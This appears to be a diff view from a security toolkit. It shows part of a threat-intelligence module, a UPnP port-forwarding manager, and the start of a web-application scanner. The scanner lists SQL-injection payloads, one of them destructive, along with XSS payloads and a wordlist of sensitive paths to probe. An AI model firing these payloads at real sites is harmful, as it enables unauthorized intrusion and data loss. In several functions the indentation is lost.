                    # e.g. 'hash_sha256' -> 'SHA-256' for the STIX hashes key
                    hash_algo = ioc['ioc_type'].replace('hash_', '').upper().replace('SHA', 'SHA-')
                    obj = {
                        'type': 'indicator',
                        'id': f"indicator--{ioc['id']}",
                        'name': ioc['value'],
                        'pattern': f"[file:hashes.'{hash_algo}' = '{ioc['value']}']",
                        'pattern_type': 'stix',
                        'valid_from': ioc.get('first_seen', ''),
                        'labels': ioc.get('tags', [])
                    }
                else:
                    obj = {
                        'type': 'indicator',
                        'id': f"indicator--{ioc['id']}",
                        'name': ioc['value'],
                        'pattern': f"[{stix_type}:value = '{ioc['value']}']",
                        'pattern_type': 'stix',
                        'valid_from': ioc.get('first_seen', ''),
                        'labels': ioc.get('tags', [])
                    }
                objects.append(obj)
            bundle = {
                'type': 'bundle',
                'id': f'bundle--autarch-{int(time.time())}',
                'objects': objects
            }
            return json.dumps(bundle, indent=2)
        else:  # json
            return json.dumps(iocs, indent=2)
def get_stats(self) -> Dict:
"""Get IOC database statistics."""
by_type = {}
by_severity = {}
by_source = {}
for ioc in self.iocs:
by_type[ioc.ioc_type] = by_type.get(ioc.ioc_type, 0) + 1
by_severity[ioc.severity] = by_severity.get(ioc.severity, 0) + 1
by_source[ioc.source] = by_source.get(ioc.source, 0) + 1
return {
'total': len(self.iocs),
'active': sum(1 for i in self.iocs if i.active),
'by_type': by_type,
'by_severity': by_severity,
'by_source': by_source
}
# ── Feed Management ──────────────────────────────────────────────────
def add_feed(self, name: str, feed_type: str, url: str,
api_key: str = "", interval_hours: int = 24) -> Dict:
"""Add a threat intelligence feed."""
feed = Feed(
name=name, feed_type=feed_type, url=url,
api_key=api_key, interval_hours=interval_hours
)
self.feeds.append(feed)
self._save_feeds()
return {'ok': True, 'feed': feed.to_dict()}
def remove_feed(self, feed_id: str) -> Dict:
"""Remove feed by ID."""
before = len(self.feeds)
self.feeds = [
f for f in self.feeds
if hashlib.md5(f"{f.name}:{f.url}".encode()).hexdigest()[:12] != feed_id
]
if len(self.feeds) < before:
self._save_feeds()
return {'ok': True}
return {'ok': False, 'error': 'Feed not found'}
def get_feeds(self) -> List[Dict]:
"""List all feeds."""
return [f.to_dict() for f in self.feeds]
    def fetch_feed(self, feed_id: str) -> Dict:
        """Fetch IOCs from one configured feed over HTTP.

        Supports feed_type 'csv_url' (text routed through bulk_import),
        'json_url' (a list — or a {data|results} wrapper — of strings or
        dicts), and 'stix_file' (a bundle of STIX indicator objects).
        Updates the feed's last_fetch/ioc_count on success. Returns
        {'ok': True, 'imported': n, 'feed': name} or an error dict.
        """
        if not requests:
            return {'ok': False, 'error': 'requests library not available'}
        feed = None
        for f in self.feeds:
            # ids are derived from (name, url) exactly as in Feed.to_dict()
            if hashlib.md5(f"{f.name}:{f.url}".encode()).hexdigest()[:12] == feed_id:
                feed = f
                break
        if not feed:
            return {'ok': False, 'error': 'Feed not found'}
        try:
            headers = {}
            if feed.api_key:
                # Send both common auth header styles; servers use whichever
                # they recognize.
                headers['Authorization'] = f'Bearer {feed.api_key}'
                headers['X-API-Key'] = feed.api_key
            resp = requests.get(feed.url, headers=headers, timeout=30)
            resp.raise_for_status()
            imported = 0
            if feed.feed_type == 'csv_url':
                result = self.bulk_import(resp.text, source=feed.name)
                imported = result['imported']
            elif feed.feed_type == 'json_url':
                data = resp.json()
                items = data if isinstance(data, list) else data.get('data', data.get('results', []))
                for item in items:
                    if isinstance(item, str):
                        self.add_ioc(item, source=feed.name)
                        imported += 1
                    elif isinstance(item, dict):
                        # Try the common key names used by public feeds.
                        val = item.get('value', item.get('indicator', item.get('ioc', '')))
                        if val:
                            self.add_ioc(
                                val,
                                ioc_type=item.get('type', None),
                                source=feed.name,
                                severity=item.get('severity', 'unknown'),
                                description=item.get('description', ''),
                                tags=item.get('tags', [])
                            )
                            imported += 1
            elif feed.feed_type == 'stix_file':
                data = resp.json()
                objects = data.get('objects', [])
                for obj in objects:
                    if obj.get('type') == 'indicator':
                        pattern = obj.get('pattern', '')
                        # Extract value from STIX pattern, e.g.
                        # [ipv4-addr:value = '1.2.3.4'] — first quoted literal.
                        m = re.search(r"=\s*'([^']+)'", pattern)
                        if m:
                            self.add_ioc(
                                m.group(1), source=feed.name,
                                description=obj.get('name', ''),
                                tags=obj.get('labels', [])
                            )
                            imported += 1
            feed.last_fetch = datetime.now(timezone.utc).isoformat()
            feed.ioc_count = imported
            self._save_feeds()
            return {'ok': True, 'imported': imported, 'feed': feed.name}
        except Exception as e:
            return {'ok': False, 'error': str(e)}
# ── Reputation Lookups ───────────────────────────────────────────────
    def lookup_virustotal(self, value: str, api_key: str) -> Dict:
        """Look up an IOC's reputation on VirusTotal (API v3).

        Supports ip, domain, file-hash and url IOCs; anything else is
        rejected. Returns the last-analysis verdict counts on success, a
        'Not found' message on 404, or an error dict.
        """
        if not requests:
            return {'ok': False, 'error': 'requests library not available'}
        ioc_type = self.detect_ioc_type(value)
        headers = {'x-apikey': api_key}
        try:
            if ioc_type == 'ip':
                url = f'https://www.virustotal.com/api/v3/ip_addresses/{value}'
            elif ioc_type == 'domain':
                url = f'https://www.virustotal.com/api/v3/domains/{value}'
            elif ioc_type in ('hash_md5', 'hash_sha1', 'hash_sha256'):
                url = f'https://www.virustotal.com/api/v3/files/{value}'
            elif ioc_type == 'url':
                # VT v3 accepts the SHA-256 of the URL as its identifier.
                url_id = hashlib.sha256(value.encode()).hexdigest()
                url = f'https://www.virustotal.com/api/v3/urls/{url_id}'
            else:
                return {'ok': False, 'error': f'Unsupported type for VT lookup: {ioc_type}'}
            resp = requests.get(url, headers=headers, timeout=15)
            if resp.status_code == 200:
                data = resp.json().get('data', {}).get('attributes', {})
                stats = data.get('last_analysis_stats', {})
                return {
                    'ok': True,
                    'value': value,
                    'type': ioc_type,
                    'malicious': stats.get('malicious', 0),
                    'suspicious': stats.get('suspicious', 0),
                    'harmless': stats.get('harmless', 0),
                    'undetected': stats.get('undetected', 0),
                    'reputation': data.get('reputation', 0),
                    'source': 'virustotal'
                }
            elif resp.status_code == 404:
                # Unknown to VT is not an error — report it as a clean miss.
                return {'ok': True, 'value': value, 'message': 'Not found in VirusTotal'}
            else:
                return {'ok': False, 'error': f'VT API error: {resp.status_code}'}
        except Exception as e:
            return {'ok': False, 'error': str(e)}
    def lookup_abuseipdb(self, ip: str, api_key: str) -> Dict:
        """Look up an IP's abuse reputation on AbuseIPDB (v2 check endpoint).

        Queries with a 90-day report window and returns the confidence
        score, report count and network metadata, or an error dict.
        """
        if not requests:
            return {'ok': False, 'error': 'requests library not available'}
        try:
            resp = requests.get(
                'https://api.abuseipdb.com/api/v2/check',
                params={'ipAddress': ip, 'maxAgeInDays': 90},
                headers={'Key': api_key, 'Accept': 'application/json'},
                timeout=15
            )
            if resp.status_code == 200:
                data = resp.json().get('data', {})
                return {
                    'ok': True,
                    'ip': ip,
                    'abuse_score': data.get('abuseConfidenceScore', 0),
                    'total_reports': data.get('totalReports', 0),
                    'country': data.get('countryCode', ''),
                    'isp': data.get('isp', ''),
                    'domain': data.get('domain', ''),
                    'is_public': data.get('isPublic', False),
                    'source': 'abuseipdb'
                }
            return {'ok': False, 'error': f'AbuseIPDB error: {resp.status_code}'}
        except Exception as e:
            return {'ok': False, 'error': str(e)}
# ── Correlation ──────────────────────────────────────────────────────
def correlate_network(self, connections: List[Dict]) -> List[Dict]:
"""Check network connections against IOC database."""
ioc_ips = {ioc.value for ioc in self.iocs if ioc.ioc_type == 'ip' and ioc.active}
ioc_domains = {ioc.value for ioc in self.iocs if ioc.ioc_type == 'domain' and ioc.active}
matches = []
for conn in connections:
remote_ip = conn.get('remote_addr', conn.get('ip', ''))
remote_host = conn.get('hostname', '')
if remote_ip in ioc_ips:
ioc = next(i for i in self.iocs if i.value == remote_ip)
matches.append({
'connection': conn,
'ioc': ioc.to_dict(),
'match_type': 'ip',
'severity': ioc.severity
})
if remote_host and remote_host in ioc_domains:
ioc = next(i for i in self.iocs if i.value == remote_host)
matches.append({
'connection': conn,
'ioc': ioc.to_dict(),
'match_type': 'domain',
'severity': ioc.severity
})
if matches:
self.alerts.extend([{
'timestamp': datetime.now(timezone.utc).isoformat(),
'type': 'network_match',
**m
} for m in matches])
return matches
def correlate_file_hashes(self, hashes: List[str]) -> List[Dict]:
"""Check file hashes against IOC database."""
hash_iocs = {
ioc.value.lower(): ioc
for ioc in self.iocs
if ioc.ioc_type.startswith('hash_') and ioc.active
}
matches = []
for h in hashes:
if h.lower() in hash_iocs:
ioc = hash_iocs[h.lower()]
matches.append({
'hash': h,
'ioc': ioc.to_dict(),
'severity': ioc.severity
})
return matches
# ── Blocklist Generation ─────────────────────────────────────────────
def generate_blocklist(self, fmt: str = 'plain', ioc_type: str = 'ip',
min_severity: str = 'low') -> str:
"""Generate blocklist from IOCs."""
severity_order = ['info', 'low', 'medium', 'high', 'critical']
min_idx = severity_order.index(min_severity) if min_severity in severity_order else 0
items = []
for ioc in self.iocs:
if not ioc.active or ioc.ioc_type != ioc_type:
continue
sev_idx = severity_order.index(ioc.severity) if ioc.severity in severity_order else -1
if sev_idx >= min_idx:
items.append(ioc.value)
if fmt == 'iptables':
return '\n'.join(f'iptables -A INPUT -s {ip} -j DROP' for ip in items)
elif fmt == 'nginx_deny':
return '\n'.join(f'deny {ip};' for ip in items)
elif fmt == 'hosts':
return '\n'.join(f'0.0.0.0 {d}' for d in items)
elif fmt == 'dns_blocklist':
return '\n'.join(items)
elif fmt == 'snort':
return '\n'.join(
f'alert ip {ip} any -> $HOME_NET any (msg:"AUTARCH IOC match {ip}"; sid:{i+1000000}; rev:1;)'
for i, ip in enumerate(items)
)
else: # plain
return '\n'.join(items)
def get_alerts(self, limit: int = 100) -> List[Dict]:
"""Get recent correlation alerts."""
return self.alerts[-limit:]
def clear_alerts(self):
"""Clear all alerts."""
self.alerts.clear()
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None


def get_threat_intel() -> ThreatIntelEngine:
    """Return the process-wide ThreatIntelEngine, creating it on first use."""
    global _instance
    if _instance is None:
        _instance = ThreatIntelEngine()
    return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
    """CLI entry point for Threat Intel module.

    Interactive menu loop over the singleton engine: IOC CRUD, bulk import,
    export, feed listing, VirusTotal lookups, blocklist generation, stats
    and alerts. Loops until '0' is entered.
    """
    engine = get_threat_intel()
    while True:
        stats = engine.get_stats()
        print(f"\n{'='*60}")
        print(f" Threat Intelligence ({stats['total']} IOCs, {len(engine.feeds)} feeds)")
        print(f"{'='*60}")
        print()
        print(" 1 — Add IOC")
        print(" 2 — Search IOCs")
        print(" 3 — Bulk Import")
        print(" 4 — Export IOCs")
        print(" 5 — Manage Feeds")
        print(" 6 — Reputation Lookup")
        print(" 7 — Generate Blocklist")
        print(" 8 — View Stats")
        print(" 9 — View Alerts")
        print(" 0 — Back")
        print()
        choice = input(" > ").strip()
        if choice == '0':
            break
        elif choice == '1':
            value = input(" IOC value: ").strip()
            if value:
                # Empty answers fall back to auto-detection / 'unknown'.
                ioc_type = input(f" Type (auto-detected: {engine.detect_ioc_type(value)}): ").strip()
                severity = input(" Severity (critical/high/medium/low/info): ").strip() or 'unknown'
                desc = input(" Description: ").strip()
                result = engine.add_ioc(value, ioc_type=ioc_type or None,
                                        severity=severity, description=desc)
                print(f" {result['action']}: {result['ioc']['value']} ({result['ioc']['ioc_type']})")
        elif choice == '2':
            search = input(" Search term: ").strip()
            results = engine.get_iocs(search=search)
            print(f" Found {len(results)} IOCs:")
            # Cap display at 20 rows to keep the terminal readable.
            for ioc in results[:20]:
                print(f" [{ioc['severity']:<8}] {ioc['ioc_type']:<12} {ioc['value']}")
        elif choice == '3':
            print(" Paste IOCs (one per line, Ctrl+D/blank line to finish):")
            lines = []
            while True:
                try:
                    line = input()
                    if not line:
                        break
                    lines.append(line)
                except EOFError:
                    break
            if lines:
                result = engine.bulk_import('\n'.join(lines))
                print(f" Imported: {result['imported']}, Skipped: {result['skipped']}")
        elif choice == '4':
            fmt = input(" Format (json/csv/stix): ").strip() or 'json'
            output = engine.export_iocs(fmt=fmt)
            outfile = os.path.join(engine.data_dir, f'export.{fmt}')
            with open(outfile, 'w') as f:
                f.write(output)
            print(f" Exported to {outfile}")
        elif choice == '5':
            print(f" Feeds ({len(engine.feeds)}):")
            for f in engine.get_feeds():
                print(f" {f['name']} ({f['feed_type']}) — last: {f['last_fetch'] or 'never'}")
        elif choice == '6':
            value = input(" Value to look up: ").strip()
            api_key = input(" VirusTotal API key: ").strip()
            if value and api_key:
                result = engine.lookup_virustotal(value, api_key)
                if result['ok']:
                    print(f" Malicious: {result.get('malicious', 'N/A')} | "
                          f"Suspicious: {result.get('suspicious', 'N/A')}")
                else:
                    print(f" Error: {result.get('error', result.get('message'))}")
        elif choice == '7':
            fmt = input(" Format (plain/iptables/nginx_deny/hosts/snort): ").strip() or 'plain'
            ioc_type = input(" IOC type (ip/domain): ").strip() or 'ip'
            output = engine.generate_blocklist(fmt=fmt, ioc_type=ioc_type)
            print(f" Generated {len(output.splitlines())} rules")
        elif choice == '8':
            print(f" Total IOCs: {stats['total']}")
            print(f" Active: {stats['active']}")
            print(f" By type: {stats['by_type']}")
            print(f" By severity: {stats['by_severity']}")
        elif choice == '9':
            alerts = engine.get_alerts()
            print(f" {len(alerts)} alerts:")
            # Show only the 10 newest alerts.
            for a in alerts[-10:]:
                print(f" [{a.get('severity', '?')}] {a.get('match_type')}: "
                      f"{a.get('ioc', {}).get('value', '?')}")

331
modules/upnp_manager.py Normal file
View File

@@ -0,0 +1,331 @@
"""
AUTARCH UPnP Port Manager Module
Manage UPnP port forwarding and cron refresh jobs
Requires: miniupnpc (upnpc command)
"""
import sys
from pathlib import Path
# Module metadata
DESCRIPTION = "UPnP port forwarding manager"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "defense"
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors, clear_screen
from core.config import get_config
from core.upnp import get_upnp_manager
def print_status(message: str, status: str = "info"):
    """Print a colorized status line: [*] info, [+] success, [!] warning, [X] error."""
    palette = {"info": Colors.CYAN, "success": Colors.GREEN, "warning": Colors.YELLOW, "error": Colors.RED}
    marks = {"info": "*", "success": "+", "warning": "!", "error": "X"}
    color = palette.get(status, Colors.WHITE)
    mark = marks.get(status, '*')
    print(f"{color}[{mark}] {message}{Colors.RESET}")
def show_menu(upnp):
    """Display the UPnP manager menu with current IP and cron status."""
    cron = upnp.get_cron_status()
    cron_str = f"every {cron['interval']}" if cron['installed'] else "not installed"
    internal_ip = upnp._get_internal_ip()
    print(f"\n{Colors.BOLD}{Colors.BLUE}UPnP Port Manager{Colors.RESET}")
    print(f"{Colors.DIM}{'' * 40}{Colors.RESET}")
    print(f" Internal IP: {Colors.CYAN}{internal_ip}{Colors.RESET}")
    print(f" Cron: {Colors.GREEN if cron['installed'] else Colors.YELLOW}{cron_str}{Colors.RESET}")
    print(f"{Colors.DIM}{'' * 40}{Colors.RESET}")
    print(f" {Colors.BLUE}[1]{Colors.RESET} Show Current Mappings")
    print(f" {Colors.BLUE}[2]{Colors.RESET} Add Port Mapping")
    print(f" {Colors.BLUE}[3]{Colors.RESET} Remove Port Mapping")
    print(f" {Colors.BLUE}[4]{Colors.RESET} Refresh All Mappings")
    print(f" {Colors.BLUE}[5]{Colors.RESET} Show External IP")
    print(f" {Colors.BLUE}[6]{Colors.RESET} Cron Job Settings")
    print(f" {Colors.BLUE}[7]{Colors.RESET} Edit Internal IP")
    print(f" {Colors.BLUE}[8]{Colors.RESET} Edit Port Mappings Config")
    print(f" {Colors.RED}[0]{Colors.RESET} Back")
    print()
def show_mappings(upnp):
    """Show current UPnP port mappings as reported by upnpc."""
    print(f"\n{Colors.BOLD}Current UPnP Mappings{Colors.RESET}")
    success, output = upnp.list_mappings()
    if success:
        print(output)
    else:
        print_status(output, "error")
    input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
def add_mapping(upnp):
    """Interactively add a new port mapping, optionally persisting it.

    Prompts for external/internal port, protocol and description, forwards
    via UPnP, then offers to store the mapping in the config so the cron
    refresh keeps it alive.
    """
    print(f"\n{Colors.BOLD}Add Port Mapping{Colors.RESET}")
    try:
        internal_ip = upnp._get_internal_ip()
        ext_port = input(f" External port: ").strip()
        if not ext_port:
            return
        ext_port = int(ext_port)
        # Internal port defaults to the external one.
        int_port_str = input(f" Internal port [{ext_port}]: ").strip()
        int_port = int(int_port_str) if int_port_str else ext_port
        proto = input(f" Protocol (TCP/UDP) [TCP]: ").strip().upper()
        if not proto:
            proto = 'TCP'
        if proto not in ('TCP', 'UDP'):
            print_status("Invalid protocol", "error")
            return
        desc = input(f" Description [AUTARCH]: ").strip()
        if not desc:
            desc = 'AUTARCH'
        success, output = upnp.add_mapping(internal_ip, int_port, ext_port, proto, desc)
        if success:
            print_status(f"Mapping added: {ext_port}/{proto} -> {internal_ip}:{int_port}", "success")
            # Offer to save to config
            save = input(f"\n Save to config? (y/n) [y]: ").strip().lower()
            if save != 'n':
                mappings = upnp.load_mappings_from_config()
                # Check if already exists
                exists = any(m['port'] == ext_port and m['protocol'] == proto for m in mappings)
                if not exists:
                    mappings.append({'port': ext_port, 'protocol': proto})
                    upnp.save_mappings_to_config(mappings)
                    print_status("Saved to config", "success")
                else:
                    print_status("Already in config", "info")
        else:
            print_status(f"Failed: {output}", "error")
    except ValueError:
        # Raised by int() on a non-numeric port.
        print_status("Invalid port number", "error")
    except KeyboardInterrupt:
        print()
def remove_mapping(upnp):
    """Interactively remove a port mapping and optionally drop it from config."""
    print(f"\n{Colors.BOLD}Remove Port Mapping{Colors.RESET}")
    try:
        ext_port = input(f" External port: ").strip()
        if not ext_port:
            return
        ext_port = int(ext_port)
        proto = input(f" Protocol (TCP/UDP) [TCP]: ").strip().upper()
        if not proto:
            proto = 'TCP'
        success, output = upnp.remove_mapping(ext_port, proto)
        if success:
            print_status(f"Mapping removed: {ext_port}/{proto}", "success")
            # Offer to remove from config
            remove = input(f"\n Remove from config? (y/n) [y]: ").strip().lower()
            if remove != 'n':
                mappings = upnp.load_mappings_from_config()
                mappings = [m for m in mappings if not (m['port'] == ext_port and m['protocol'] == proto)]
                upnp.save_mappings_to_config(mappings)
                print_status("Removed from config", "success")
        else:
            print_status(f"Failed: {output}", "error")
    except ValueError:
        print_status("Invalid port number", "error")
    except KeyboardInterrupt:
        print()
def refresh_all(upnp):
    """Re-apply every mapping stored in the config and report per-port results."""
    mappings = upnp.load_mappings_from_config()
    if not mappings:
        print_status("No mappings configured. Use option [8] to edit.", "warning")
        input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        return
    print(f"\n{Colors.BOLD}Refreshing {len(mappings)} mapping(s)...{Colors.RESET}")
    results = upnp.refresh_all()
    for r in results:
        if r['success']:
            print_status(f"{r['port']}/{r['protocol']}: OK", "success")
        else:
            print_status(f"{r['port']}/{r['protocol']}: {r['message']}", "error")
    input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
def show_external_ip(upnp):
    """Query the IGD for the external IP and display it."""
    success, ip = upnp.get_external_ip()
    if success:
        print(f"\n {Colors.BOLD}External IP:{Colors.RESET} {Colors.GREEN}{ip}{Colors.RESET}")
    else:
        # On failure the second tuple element carries the error text.
        print_status(f"Failed: {ip}", "error")
    input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
def cron_settings(upnp):
    """Manage the cron job that periodically refreshes UPnP mappings.

    Shows install or change-interval/uninstall options depending on whether
    the cron entry exists. The install and change-interval paths were
    previously duplicated verbatim; they now share one helper.
    """
    def _prompt_and_install():
        # Shared by "install" and "change interval": ask for a 1-24h
        # interval (default 12) and (re)install the cron entry.
        hours = input(f" Refresh interval (hours) [12]: ").strip()
        hours = int(hours) if hours else 12
        if hours < 1 or hours > 24:
            print_status("Interval must be 1-24 hours", "error")
            return
        success, msg = upnp.install_cron(hours)
        print_status(msg, "success" if success else "error")

    cron = upnp.get_cron_status()
    print(f"\n{Colors.BOLD}Cron Job Settings{Colors.RESET}")
    print(f"{Colors.DIM}{'' * 40}{Colors.RESET}")
    if cron['installed']:
        print(f" Status: {Colors.GREEN}Installed{Colors.RESET}")
        print(f" Interval: every {cron['interval']}")
        print(f" Entry: {Colors.DIM}{cron['line']}{Colors.RESET}")
        print()
        print(f" {Colors.BLUE}[1]{Colors.RESET} Change interval")
        print(f" {Colors.RED}[2]{Colors.RESET} Uninstall cron job")
        print(f" {Colors.DIM}[0]{Colors.RESET} Back")
    else:
        print(f" Status: {Colors.YELLOW}Not installed{Colors.RESET}")
        print()
        print(f" {Colors.BLUE}[1]{Colors.RESET} Install cron job")
        print(f" {Colors.DIM}[0]{Colors.RESET} Back")
    print()
    try:
        choice = input(f" {Colors.BOLD}>{Colors.RESET} ").strip()
        if choice == '0':
            return
        if choice == '1':
            _prompt_and_install()
        elif choice == '2' and cron['installed']:
            success, msg = upnp.uninstall_cron()
            print_status(msg, "success" if success else "error")
    except (ValueError, KeyboardInterrupt):
        # ValueError from int() on a non-numeric interval.
        print()
def edit_internal_ip(upnp):
    """Edit the internal IP address used for new mappings, persisting to config."""
    config = get_config()
    current = upnp._get_internal_ip()
    print(f"\n Current internal IP: {Colors.CYAN}{current}{Colors.RESET}")
    try:
        new_ip = input(f" New internal IP [{current}]: ").strip()
        if new_ip and new_ip != current:
            config.set('upnp', 'internal_ip', new_ip)
            config.save()
            print_status(f"Internal IP set to {new_ip}", "success")
        elif not new_ip:
            # Empty answer keeps the current value.
            print_status("Unchanged", "info")
    except KeyboardInterrupt:
        print()
def edit_mappings_config(upnp):
    """Add/remove port mappings in the persisted config (not live UPnP state).

    The config list is what refresh_all and the cron job re-apply.
    """
    mappings = upnp.load_mappings_from_config()
    print(f"\n{Colors.BOLD}Configured Port Mappings{Colors.RESET}")
    print(f"{Colors.DIM}{'' * 40}{Colors.RESET}")
    if mappings:
        for i, m in enumerate(mappings, 1):
            print(f" {Colors.BLUE}[{i}]{Colors.RESET} {m['port']}/{m['protocol']}")
    else:
        print(f" {Colors.DIM}(none configured){Colors.RESET}")
    print()
    print(f" {Colors.GREEN}[a]{Colors.RESET} Add mapping to config")
    if mappings:
        print(f" {Colors.RED}[d]{Colors.RESET} Delete mapping from config")
    print(f" {Colors.DIM}[0]{Colors.RESET} Back")
    print()
    try:
        choice = input(f" {Colors.BOLD}>{Colors.RESET} ").strip().lower()
        if choice == '0':
            return
        elif choice == 'a':
            port = input(f" Port: ").strip()
            if not port:
                return
            port = int(port)
            proto = input(f" Protocol (TCP/UDP) [TCP]: ").strip().upper()
            if not proto:
                proto = 'TCP'
            if proto not in ('TCP', 'UDP'):
                print_status("Invalid protocol", "error")
                return
            exists = any(m['port'] == port and m['protocol'] == proto for m in mappings)
            if exists:
                print_status("Already in config", "info")
                return
            mappings.append({'port': port, 'protocol': proto})
            upnp.save_mappings_to_config(mappings)
            print_status(f"Added {port}/{proto}", "success")
        elif choice == 'd' and mappings:
            # Selection is 1-based on screen; convert to 0-based index.
            idx = input(f" Number to delete: ").strip()
            idx = int(idx) - 1
            if 0 <= idx < len(mappings):
                removed = mappings.pop(idx)
                upnp.save_mappings_to_config(mappings)
                print_status(f"Removed {removed['port']}/{removed['protocol']}", "success")
            else:
                print_status("Invalid selection", "error")
    except (ValueError, KeyboardInterrupt):
        print()
def run():
    """Main entry point for the UPnP manager module."""
    config = get_config()
    upnp = get_upnp_manager(config)
    if not upnp.is_available():
        print_status("upnpc (miniupnpc) is not installed!", "error")
        print(f" {Colors.DIM}Install with: sudo apt install miniupnpc{Colors.RESET}")
        input(f"\n{Colors.DIM}Press Enter to go back...{Colors.RESET}")
        return
    # Menu choice -> handler; every handler takes the UPnP manager.
    actions = {
        '1': show_mappings,
        '2': add_mapping,
        '3': remove_mapping,
        '4': refresh_all,
        '5': show_external_ip,
        '6': cron_settings,
        '7': edit_internal_ip,
        '8': edit_mappings_config,
    }
    while True:
        try:
            clear_screen()
            show_menu(upnp)
            choice = input(f" {Colors.BOLD}>{Colors.RESET} ").strip()
            if choice == '0':
                break
            handler = actions.get(choice)
            if handler is not None:
                handler(upnp)
        except KeyboardInterrupt:
            # Ctrl-C anywhere exits the module, same as choosing 0.
            break

1377
modules/vuln_scanner.py Normal file

File diff suppressed because it is too large Load Diff

724
modules/webapp_scanner.py Normal file
View File

@@ -0,0 +1,724 @@
"""AUTARCH Web Application Scanner
Directory bruteforce, subdomain enumeration, vulnerability scanning (SQLi, XSS),
header analysis, technology fingerprinting, SSL/TLS audit, and crawler.
"""
DESCRIPTION = "Web application vulnerability scanner"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "offense"
import os
import re
import json
import time
import ssl
import socket
import hashlib
import threading
import subprocess
from pathlib import Path
from urllib.parse import urlparse, urljoin, quote
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Any, Set
from datetime import datetime, timezone
# Prefer the project's path helpers; fall back to stdlib equivalents so the
# module still imports when run outside the AUTARCH tree.
try:
    from core.paths import find_tool, get_data_dir
except ImportError:
    import shutil
    def find_tool(name):
        """Locate an executable on PATH (stdlib fallback for core.paths)."""
        return shutil.which(name)
    def get_data_dir():
        """Return the default data directory next to the package root."""
        return str(Path(__file__).parent.parent / 'data')
# requests is optional: HTTP-based features check _HAS_REQUESTS before use.
try:
    import requests
    from requests.exceptions import RequestException
    _HAS_REQUESTS = True
except ImportError:
    _HAS_REQUESTS = False
# ── Tech Fingerprints ─────────────────────────────────────────────────────────
# Per-technology signatures matched (case-insensitively) against response
# headers, the first 50KB of the body, and cookie names by _fingerprint_tech().
TECH_SIGNATURES = {
    'WordPress': {'headers': [], 'body': ['wp-content', 'wp-includes', 'wp-json'], 'cookies': ['wordpress_']},
    'Drupal': {'headers': ['X-Drupal-'], 'body': ['Drupal.settings', 'sites/default'], 'cookies': ['SESS']},
    'Joomla': {'headers': [], 'body': ['/media/jui/', 'com_content'], 'cookies': []},
    'Laravel': {'headers': [], 'body': ['laravel_session'], 'cookies': ['laravel_session']},
    'Django': {'headers': [], 'body': ['csrfmiddlewaretoken', '__admin__'], 'cookies': ['csrftoken', 'sessionid']},
    'Express': {'headers': ['X-Powered-By: Express'], 'body': [], 'cookies': ['connect.sid']},
    'ASP.NET': {'headers': ['X-AspNet-Version', 'X-Powered-By: ASP.NET'], 'body': ['__VIEWSTATE', '__EVENTVALIDATION'], 'cookies': ['ASP.NET_SessionId']},
    'PHP': {'headers': ['X-Powered-By: PHP'], 'body': ['.php'], 'cookies': ['PHPSESSID']},
    'Nginx': {'headers': ['Server: nginx'], 'body': [], 'cookies': []},
    'Apache': {'headers': ['Server: Apache'], 'body': [], 'cookies': []},
    'IIS': {'headers': ['Server: Microsoft-IIS'], 'body': [], 'cookies': []},
    'Cloudflare': {'headers': ['Server: cloudflare', 'cf-ray'], 'body': [], 'cookies': ['__cfduid']},
    'React': {'headers': [], 'body': ['react-root', '_reactRootContainer', 'data-reactroot'], 'cookies': []},
    'Angular': {'headers': [], 'body': ['ng-app', 'ng-controller', 'angular.min.js'], 'cookies': []},
    'Vue.js': {'headers': [], 'body': ['vue.min.js', 'v-bind:', 'v-if=', '__vue__'], 'cookies': []},
    'jQuery': {'headers': [], 'body': ['jquery.min.js', 'jquery-'], 'cookies': []},
    'Bootstrap': {'headers': [], 'body': ['bootstrap.min.css', 'bootstrap.min.js'], 'cookies': []},
}
# Response headers rated present/missing/weak by _check_security_headers().
SECURITY_HEADERS = [
    'Content-Security-Policy',
    'X-Content-Type-Options',
    'X-Frame-Options',
    'X-XSS-Protection',
    'Strict-Transport-Security',
    'Referrer-Policy',
    'Permissions-Policy',
    'Cross-Origin-Opener-Policy',
    'Cross-Origin-Resource-Policy',
    'Cross-Origin-Embedder-Policy',
]
# Common directories for bruteforce
DIR_WORDLIST_SMALL = [
    'admin', 'login', 'wp-admin', 'administrator', 'phpmyadmin', 'cpanel',
    'dashboard', 'api', 'backup', 'config', 'db', 'debug', 'dev', 'docs',
    'dump', 'env', 'git', 'hidden', 'include', 'internal', 'log', 'logs',
    'old', 'panel', 'private', 'secret', 'server-status', 'shell', 'sql',
    'staging', 'status', 'temp', 'test', 'tmp', 'upload', 'uploads',
    'wp-content', 'wp-includes', '.env', '.git', '.htaccess', '.htpasswd',
    'robots.txt', 'sitemap.xml', 'crossdomain.xml', 'web.config',
    'composer.json', 'package.json', '.svn', '.DS_Store',
    'cgi-bin', 'server-info', 'info.php', 'phpinfo.php', 'xmlrpc.php',
    'wp-login.php', '.well-known', 'favicon.ico', 'humans.txt',
]
# SQLi test payloads
SQLI_PAYLOADS = [
    "'", "\"", "' OR '1'='1", "\" OR \"1\"=\"1",
    "' OR 1=1--", "\" OR 1=1--", "'; DROP TABLE--",
    "1' AND '1'='1", "1 AND 1=1", "1 UNION SELECT NULL--",
    "' UNION SELECT NULL,NULL--", "1'; WAITFOR DELAY '0:0:5'--",
    "1' AND SLEEP(5)--",
]
# XSS test payloads
XSS_PAYLOADS = [
    '<script>alert(1)</script>',
    '"><script>alert(1)</script>',
    "'><script>alert(1)</script>",
    '<img src=x onerror=alert(1)>',
    '<svg onload=alert(1)>',
    '"><img src=x onerror=alert(1)>',
    "javascript:alert(1)",
    '<body onload=alert(1)>',
]
# SQL error signatures
# Substrings searched (lower-cased) in responses to detect error-based SQLi.
SQL_ERRORS = [
    'sql syntax', 'mysql_fetch', 'mysql_num_rows', 'mysql_query',
    'pg_query', 'pg_exec', 'sqlite3', 'SQLSTATE',
    'ORA-', 'Microsoft OLE DB', 'Unclosed quotation mark',
    'ODBC Microsoft Access', 'JET Database', 'Microsoft SQL Server',
    'java.sql.SQLException', 'PostgreSQL query failed',
